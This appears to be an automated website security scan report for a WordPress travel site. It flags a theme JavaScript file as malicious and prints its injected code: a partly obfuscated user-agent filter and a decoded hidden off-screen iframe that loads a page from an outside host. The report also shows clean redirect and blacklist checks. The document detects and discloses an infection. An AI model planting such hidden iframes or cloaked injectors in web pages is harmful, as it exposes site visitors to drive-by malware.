Scanned pages/files
Request | Server response | Status |
http://turistos-master.ru/ | 200 OK Content-Length: 55601 Content-Type: text/html | clean |
http://turistos-master.ru/wp-content/themes/tree-house/dhtml.js | 200 OK Content-Length: 2255 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire } } })(); navHover = function() { var lis = document.getElementById("nav").getElementsByTagName("LI"); for (var i=0; i<lis.length; i++) { lis[i].onmouseover=function() { this.className+=" iehover"; } lis[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" iehover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", navHover); Decoded script: function () { var lis = document.getElementById("nav").getElementsByTagName("LI"); for (var i = 0; i < lis.length; i++) { lis[i].onmouseover = function () {this.className += " iehover";}; lis[i].onmouseout = function () {this.className = this.className.replace(new RegExp(" iehover\\b"), "");}; } } <iframe src="http://scsczero.hycrete.com.br/jtrsdhtrjtydkytk8.html" style="position:absolute;left:-1309px;top:-1309px;" height="175" width="175" name="Anatoli"></iframe> Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21308 Content-Type: text/javascript | clean |
http://turistos-master.ru/?feed=rss2 | 200 OK Content-Length: 41019 Content-Type: text/html | clean |
http://turistos-master.ru/wp-content/uploads/2013/02/mardi_gras_019.jpg | 200 OK Content-Length: 62716 Content-Type: image/jpeg | clean |
http://turistos-master.ru/test404page.js | 404 Not Found Content-Length: 1 Content-Type: text/html | clean |
http://turistos-master.ru/wp-content/uploads/2012/12/sydney-aquarium.jpg | 200 OK Content-Length: 228334 Content-Type: image/jpeg | clean |
http://turistos-master.ru/wp-content/uploads/2012/12/1271101015_1271084929_1271008531_pink-lake-01.jpg | 200 OK Content-Length: 68229 Content-Type: image/jpeg | clean |
http://turistos-master.ru/wp-content/uploads/2012/09/39078737_1233590153_1656.jpg | 200 OK Content-Length: 84628 Content-Type: image/jpeg | clean |
http://turistos-master.ru/wp-content/uploads/2012/09/be7b5c4a7132525444394bae0bd7d66b585120111136843.jpg | 200 OK Content-Length: 62374 Content-Type: image/jpeg | clean |
http://turistos-master.ru/wp-content/uploads/2012/09/12688929551220717740_0_5.jpg | 200 OK Content-Length: 45215 Content-Type: image/jpeg | clean |
http://turistos-master.ru/wp-content/uploads/2012/09/argyle_cove.jpg | 200 OK Content-Length: 91540 Content-Type: image/jpeg | clean |
http://turistos-master.ru/wp-content/uploads/2012/09/queen-victoria-building-sydney-ipoh-garden-berhad3.jpg | 200 OK Content-Length: 196138 Content-Type: image/jpeg | clean |
http://turistos-master.ru/wp-content/uploads/2012/08/stud.png | 200 OK Content-Length: 300084 Content-Type: image/png | clean |
http://turistos-master.ru/wp-content/uploads/2012/08/1.jpg | 200 OK Content-Length: 57625 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: turistos-master.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Sat, 04 Oct 2014 08:18:34 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 55601
Content-Type: text/html;charset=utf-8
Expires: Tue, 07 Oct 2014 00:00:00 GMT
Last-Modified: Sat, 04 Oct 2014 00:00:00 GMT
X-Powered-By: PHP/5.2.17
...55601 bytes of data.
GET / HTTP/1.1
Host: turistos-master.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Sat, 04 Oct 2014 08:18:34 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 55601
Content-Type: text/html;charset=utf-8
Expires: Tue, 07 Oct 2014 00:00:00 GMT
Last-Modified: Sat, 04 Oct 2014 00:00:00 GMT
X-Powered-By: PHP/5.2.17
...55601 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: turistos-master.ru
Referer: http://www.google.com/search?q=turistos-master.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: turistos-master.ru
Referer: http://www.google.com/search?q=turistos-master.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=turistos-master.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://turistos-master.ru/
Result: turistos-master.ru is not infected or malware details are not published yet.
Result: turistos-master.ru is not infected or malware details are not published yet.